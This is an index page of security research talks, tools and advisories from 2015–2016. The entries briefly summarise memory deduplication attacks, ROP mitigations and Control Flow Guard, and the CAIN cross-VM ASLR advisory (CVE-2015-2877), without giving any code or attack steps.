Talks, White Papers, Tools, Advisories, Security Notes

Talks, White Papers & Tools

Dec 29, 2016

Memory Deduplication: The Curse that Keeps on Giving

Kaveh Razavi, Erik Bosman, Ben Gras and Antonio present 3 different attack techniques that all (ab)use memory deduplication. There is a cross-vm data leak attack, a cross-vm data write attack, and an in-sandbox (MS Edge) Javascript data leak + full memory read/write attack based in MS Edge.

Jun 16, 2016

CFG-aware ROP

Matthias contributed a Control Flow Guard check to the ROP generator Ropper. It can be used to filter out gadgets that are not valid CFG targets. You can find the code in the official master branch of the Ropper github repository.

Jun 10, 2016

ROP Mitigations and Control Flow Guard

Matthias describes the latest versions of ROP mitigations that come with EMET 5.5 and Visual Studio 2015’s Control-Flow Guard. He presents the implementation and discusses the implications for an attacker trying to exploit a hardened application.

Nov 11, 2015

Silently Breaking ASLR In The Cloud

Antonio describes Cross-VM Address Space Layout Introspection (CAIN), an attack vector against page based same content memory deduplication in Virtual Machine Monitors (VMM).

Advisories & Security Notes

Oct 31, 2016

Security Note: Potential security weaknesses in EMET 5.5 ROP mitigations

We noticed two weaknesses in the EMET 5.5 ROP mitigations implementation. These issues might be known limitations but as we didn't find any public discussion of the issues we decided to issue a security note.

View security noteDownload as text file

Jul 30, 2015

CVE-2015-2877: Cross-VM ASL INtrospection (CAIN)

We discovered a new attack vector against memory deduplication in Virtual Machine Monitors (VMM) where attackers can effectively leak randomized base addresses of libraries and executables in processes of neighboring Virtual Machines (VM).

View advisoryDownload as text file